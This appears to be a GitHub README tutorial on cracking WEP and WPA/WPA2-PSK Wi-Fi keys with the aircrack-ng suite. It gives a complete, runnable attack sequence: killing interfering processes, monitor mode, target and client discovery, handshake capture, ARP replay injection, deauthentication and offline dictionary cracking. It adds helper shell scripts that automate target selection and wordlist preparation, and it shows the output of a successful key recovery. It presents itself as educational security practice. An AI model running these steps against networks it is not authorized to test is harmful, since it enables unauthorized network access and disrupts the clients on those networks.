Ecosyste.ms: Awesome

https://github.com/david-palma/wifi-cracking

Crack 802.11 WEP and WPA/WPA2-PSK keys using Aircrack-ng suite

Topics: aircrack-ng education hack hacking infosec penetration-testing practice security tutorial wep wifi wifi-cracking wpa wpa2


# Wi-Fi cracking with aircrack-ng

[Aircrack-ng](https://aircrack-ng.org/) is a suite of tools for assessing the security of 802.11 wireless networks. It covers:

* packet sniffing
* attacking via packet injection (replay attacks, deauthentication, fake access points...)
* testing Wi-Fi cards and driver capabilities (capture and injection)
* cracking WEP keys and WPA/WPA2-PSK passphrases

Note that this tutorial is not an exhaustive guide; it is intended to build the basic skills needed to test your own network's security and to get familiar with the concepts.

The attack outlined below uses active packet injection (the ARP request replay attack, which generates traffic for WEP cracking; for WPA/WPA2-PSK the key material comes from a captured 4-way handshake instead). It focuses on Debian-based distributions and assumes you have a working wireless card whose driver supports monitor mode and packet injection.

## Aircrack-ng installation

Aircrack-ng can be installed on a Debian-based operating system by compiling the source code, as described below (for more details visit the [official website](https://aircrack-ng.org/)). Debian, Ubuntu and Kali also ship a packaged version (`sudo apt install aircrack-ng`) if you do not need the latest release.

### Installing required and optional dependencies

Below you can find instructions for installing the basic requirements to build aircrack-ng for Debian-based operating systems.

```ShellSession
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
```

Get the latest copy of aircrack-ng:

```ShellSession
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
```

### Compiling and installing

To build aircrack-ng, the Autotools build system is used.
First, `./configure` the project for building with the appropriate options:

```ShellSession
$ autoreconf -i
$ ./configure --with-experimental
```

Next, compile the project with the `make` command and install it with the `make install` target. The useful targets are:

* Execute all unit testing: `make check`
* Execute all integration testing (requires root): `make integration`
* Installing: `make install`
* Uninstall: `make uninstall`

## Test wireless device packet injection

This step verifies that your card and driver actually support injection. Note that `aireplay-ng` needs an interface in monitor mode, so run this test after `airmon-ng start` (see the next section) against the monitor interface it creates; the command below assumes that interface is named "wlan0" (you can list your interfaces with `iw dev` or `iwconfig`):

```ShellSession
# aireplay-ng --test wlan0
```

The system responds:

```ShellSession
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
```

This confirms your card can inject packets. If it instead reports that injection is not working, fix the driver or use another card before going on: every step below depends on it.

## Simple sniffing and cracking

### 1. Start the wireless interface in monitor mode

The first thing to do is to look for a potential target by putting your wireless card into monitor mode with `airmon-ng`. Before that, kill the processes that would interfere (network managers, `wpa_supplicant`, DHCP clients): left running, they change channels or pull the interface out of monitor mode while you capture.

```ShellSession
# airmon-ng check kill
Killing these processes:

PID Name
870 dhclient
1115 wpa_supplicant
```

Then enable monitor mode. `airmon-ng` creates a separate monitor interface (`mon0` below; recent releases name it `wlan0mon` instead, so use whatever name the output reports):

```ShellSession
# airmon-ng start wlan0

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
```

The output confirms that monitor mode is enabled on the radio behind "wlan0".
Then start `airodump-ng` on the monitor interface to list the networks in range:

```ShellSession
# airodump-ng mon0
```

Locate the target network and note its BSSID and channel (the `CH` column) from the following output:

```ShellSession
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
```

Note that the top part of the output lists the APs in range, and the bottom part lists the clients (stations) together with the BSSID each one is associated with.

### 2. Start airodump-ng to capture the handshake

Open another console session and run `airodump-ng` locked to the target's channel and BSSID, saving everything it captures to disk. For WEP the capture accumulates initialization vectors; for WPA/WPA2-PSK the frames that matter are the four EAPOL frames of a client's 4-way handshake, which airodump-ng records whenever a client associates or re-associates:

```ShellSession
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
```

where `-c 10` is the channel of the target network, `--bssid 08:00:BF:E6:31:2E` is the MAC address of the AP (together they restrict the capture to that one network), `-w output-file` is the prefix of the files airodump-ng writes, and `mon0` is the monitor interface.

The system responds:

```ShellSession
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router

BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
```

airodump-ng writes several files with that prefix: `output-file-01.cap` holds the raw frames that aircrack-ng needs, and `output-file-01.csv` (plus summaries in other formats) holds the AP and station tables. Once a client's handshake has been captured, the top line of the display shows `WPA handshake: 08:00:BF:E6:31:2E`; until it does, the capture is of no use for the WPA attack.
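The CSV summary makes it easy to script the target selection done by hand in steps 1 and 2. The following shell snippet is an added example, not part of the original tutorial or of the aircrack-ng project: it reads a `<prefix>-01.csv` file as written by `airodump-ng -w` (the column layout in the comments is airodump-ng's; the sample CSV itself is constructed here to mirror the screenshots above) and prints the BSSID and channel of a chosen ESSID, plus the MACs of the clients associated with that AP, which is exactly what the `-c`, `--bssid` and `-h` arguments of the following steps need. The function names are mine.

```shell
#!/bin/sh
# Added example (not from the tutorial): extract the target AP and its clients from
# the CSV summary that `airodump-ng -w <prefix>` writes as <prefix>-01.csv.
# The file has two sections separated by a blank line. The access-point section's
# header, as written by airodump-ng, is:
#   BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
#   Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
# and the station section's header is:
#   Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs

# Constructed sample CSV: the values mirror the tutorial's screenshots, plus a second
# (WEP) AP and an unassociated station so the filters can be seen to pick the right rows.
write_sample_csv() {
  cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
08:00:BF:E6:31:2E, 2019-05-15 18:15:02, 2019-05-15 18:15:38, 10, 54, WPA, CCMP, PSK, -21, 5240, 178307, 0. 0. 0. 0, 14, infosec_router, 
AA:BB:CC:DD:EE:01, 2019-05-15 18:15:03, 2019-05-15 18:15:38,  6, 54, WEP, WEP, , -60, 300, 12, 0. 0. 0. 0, 9, legacy_ap, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:35:51:AC:22, 2019-05-15 18:15:02, 2019-05-15 18:15:38, -21, 183782, 08:00:BF:E6:31:2E, 
DE:AD:BE:EF:00:01, 2019-05-15 18:15:10, 2019-05-15 18:15:30, -70, 12, (not associated), infosec_router
EOF
}

# Print "<BSSID> <channel>" for the AP whose ESSID is exactly $2; exit 1 if absent.
# Only the AP section is read: the first blank line after the header ends it.
# (An ESSID containing a comma would break this naive split; airodump-ng quotes none.)
target_bssid_channel() {
  awk -F', *' -v essid="$2" '
    { sub(/\r$/, "") }                              # airodump-ng writes CRLF line endings
    NR > 1 && NF == 0 { exit }                      # blank line: AP section is over
    $1 == "BSSID" { next }                          # header row
    NF >= 14 && $14 == essid { print $1, $4; found = 1; exit }
    END { exit found ? 0 : 1 }
  ' "$1"
}

# Print the MAC of every station that airodump-ng saw associated with BSSID $2
# (candidates for aireplay-ng's -h argument).
clients_of() {
  awk -F', *' -v bssid="$2" '
    { sub(/\r$/, "") }
    $1 == "Station MAC" { in_stations = 1; next }   # header of the second section
    in_stations && NF >= 6 && $6 == bssid { print $1 }
  ' "$1"
}

# Usage against a real capture, e.g.:
#   set -- $(target_bssid_channel output-file-01.csv infosec_router)
#   airodump-ng -c "$2" --bssid "$1" -w output-file mon0
csv="$(mktemp)"
write_sample_csv "$csv"
target_bssid_channel "$csv" infosec_router    # 08:00:BF:E6:31:2E 10
clients_of "$csv" 08:00:BF:E6:31:2E           # 00:0F:35:51:AC:22
rm -f "$csv"
```

`target_bssid_channel` exits non-zero when the ESSID is not in the file, so a wrapper script can stop instead of launching `airodump-ng` with empty arguments; stations listed as `(not associated)` are deliberately excluded from `clients_of`, since replaying their frames would do nothing.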

### 3. Start aireplay-ng in ARP request replay mode

The ARP request replay attack is the classic way to generate new initialization vectors against WEP, and it works very reliably: `aireplay-ng` listens for ARP requests from an associated client (`-h`, taken from the station list above) and reinjects them towards the AP, which answers with fresh encrypted frames. Against WPA/WPA2-PSK the replayed frames yield no key material; what the next step needs is the 4-way handshake that `airodump-ng` records when a client associates. If no client connects while you wait, `aireplay-ng`'s deauthentication mode can force an already associated client to reconnect and redo the handshake (an active, disruptive step; use it only on networks you are authorized to test).
Keep `airodump-ng` running, open another terminal and run the ARP request replay attack:

```ShellSession
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
```

You can check that the packets are being injected by watching the `#Data` and `#/s` counters in the `airodump-ng` window.

### 4. Run aircrack-ng to obtain the WPA key

At this point you can attempt to recover the WPA passphrase from the handshake captured in the previous steps. This is an offline dictionary attack: for each candidate passphrase aircrack-ng derives the pairwise master key (PBKDF2-HMAC-SHA1 over the passphrase and the ESSID, 4096 iterations) and checks the resulting key against the handshake's EAPOL MIC, so if the passphrase is not in your wordlist it will not be found. Note that many WPA/WPA2 routers ship with strong random passphrases of 12 or more characters that users (rightly) leave unchanged. If you are attempting to crack one of these, I recommend using the [WPA-length password lists](https://github.com/david-palma/wordlists#passwords-with-wpa-length).

Open another console session and type:

```ShellSession
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
```

where `-a2` forces the WPA/WPA2-PSK attack mode, `-b 08:00:BF:E6:31:2E` restricts cracking to the target BSSID, `-w wordlist.txt` is your dictionary, and `output*.cap` selects every capture file written by `airodump-ng` (e.g. `output-file-01.cap`). Running `aircrack-ng output*.cap` without `-w` first makes it list the networks in the capture and how many handshakes it found for each, a quick way to confirm the handshake is really there before spending time on the wordlist.

This is the output of a successful attack:

```ShellSession
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)

Time left: 0 seconds 15.62%

KEY FOUND! [ notsecure ]

Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63

Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A

EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
```
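Every candidate in the wordlist costs a PBKDF2 derivation, so entries that can never be a WPA passphrase are pure waste: IEEE 802.11i defines the passphrase as 8 to 63 ASCII characters in the printable range 32..126, and aircrack-ng itself skips lines outside 8..63 characters. The following shell snippet is an added example, not part of the original tutorial or of the aircrack-ng project: it trims a wordlist to valid, de-duplicated candidates before handing it to `aircrack-ng -w`, and counts what is left so the `k/s` figure aircrack-ng prints can be turned into a worst-case running time. The sample wordlist is constructed here and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the tutorial): trim a wordlist to candidates that can be a
# WPA/WPA2-PSK passphrase before handing it to aircrack-ng -w. Each candidate costs
# a PBKDF2-HMAC-SHA1 derivation (4096 iterations), so entries that can never match
# are pure waste. IEEE 802.11i defines a passphrase as 8 to 63 ASCII characters in
# the printable range 32..126; aircrack-ng itself skips lines outside 8..63 chars.

# Constructed sample wordlist with one entry of each kind we want to see handled.
write_sample_wordlist() {
  {
    printf '%s\n' short             # 5 chars: below the minimum, dropped
    printf '%s\n' notsecure         # kept (the passphrase recovered above)
    printf '%s\r\n' notsecure       # same word with a CRLF ending: duplicate, dropped
    printf '%063d\n' 0              # exactly 63 chars: the maximum, kept
    printf '%064d\n' 0              # 64 chars: too long, dropped
    printf 'p\303\244ssword\n'      # non-ASCII byte sequence (UTF-8 "ä"), dropped
    printf '%s\n' password123       # kept
  } > "$1"
}

# Keep lines of 8..63 printable-ASCII chars, in original order, without duplicates.
# LC_ALL=C makes length() count bytes and keeps the [ -~] range byte-based.
# Caveat: some devices accept non-ASCII passphrases; drop the /^[ -~]+$/ test if the
# target is known to be one of them.
wpa_filter() {
  LC_ALL=C awk '
    { sub(/\r$/, "") }                              # tolerate CRLF wordlists
    length($0) < 8 || length($0) > 63 { next }
    $0 !~ /^[ -~]+$/ { next }
    !seen[$0]++                                     # print first occurrence only
  ' "$1"
}

# Number of surviving candidates; divide by aircrack-ng's k/s figure (thousands of
# keys per second) for the worst-case time of an exhaustive run over the list.
wpa_candidate_count() {
  wpa_filter "$1" | wc -l | tr -d ' '
}

# Usage against a real list:  wpa_filter wordlist.txt > wpa-wordlist.txt
wl="$(mktemp)"
write_sample_wordlist "$wl"
wpa_filter "$wl"                     # notsecure, the 63-zero line, password123
wpa_candidate_count "$wl"            # 3
rm -f "$wl"
```

The filter is deliberately conservative about what it removes: length and character set are the only properties a passphrase must have by specification, and the duplicate removal changes nothing about which keys get tested, only how many times.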

## List of commands

Below you can find the full sequence of commands used above to attack a WPA/WPA2 network.

```
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0

# start the ARP request replay attack (generates IVs for WEP; the WPA attack only needs the handshake)
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
```

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Disclaimer

This tutorial has been made for educational purposes only. I don't promote malicious practices, and I will not be responsible for any illegal activities.